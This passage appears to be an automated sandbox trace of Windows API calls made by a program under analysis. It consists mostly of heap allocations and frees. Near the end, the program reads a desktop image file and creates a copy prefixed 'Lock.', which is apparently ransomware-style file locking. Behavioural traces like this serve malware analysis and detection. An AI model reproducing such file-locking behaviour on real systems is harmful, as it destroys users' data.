lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0162.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0162.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0162.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0162.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0162.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0162.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0162.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0162.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0162.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0162.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0162.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0162.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0162.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0162.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0162.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0162.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0162.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0162.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0162.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0162.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0162.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0162.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0162.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0162.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0162.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0162.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0162.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0162.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0162.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0162.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0162.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0162.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0162.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0162.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0162.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0162.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0162.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0162.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0162.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0162.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0162.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0162.137] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0162.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0162.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0162.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0162.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0162.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0162.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0162.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0162.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0162.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0162.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0162.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0162.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0162.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0162.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0162.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0162.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0162.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0162.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0162.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0162.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0162.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0162.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0162.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0162.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0162.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0162.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0162.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0162.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0162.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0162.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0162.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0162.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0162.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0162.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0162.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0162.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0162.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0162.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0162.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0162.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0162.142] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0162.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0162.142] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0162.142] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0162.142] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0162.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0162.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0162.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0162.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0162.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0162.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0162.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0162.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0162.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0162.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0162.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0162.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0162.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0162.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0162.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0162.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0162.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0162.143] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/bY-NIrDXo_nG.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\by-nirdxo_ng.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0162.143] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.143] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0162.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0162.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0162.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0162.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0162.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0162.144] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0162.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0162.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0162.144] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0162.144] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0162.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0162.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0162.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0162.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0162.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0162.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0162.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0162.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0162.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0162.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0162.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0162.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0162.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.145] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0162.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0162.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0162.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c7a50 [0162.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0162.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0162.146] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.bY-NIrDXo_nG.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.by-nirdxo_ng.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0162.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0162.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0162.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0162.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0162.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0162.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0162.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.148] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0162.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0162.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0162.148] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 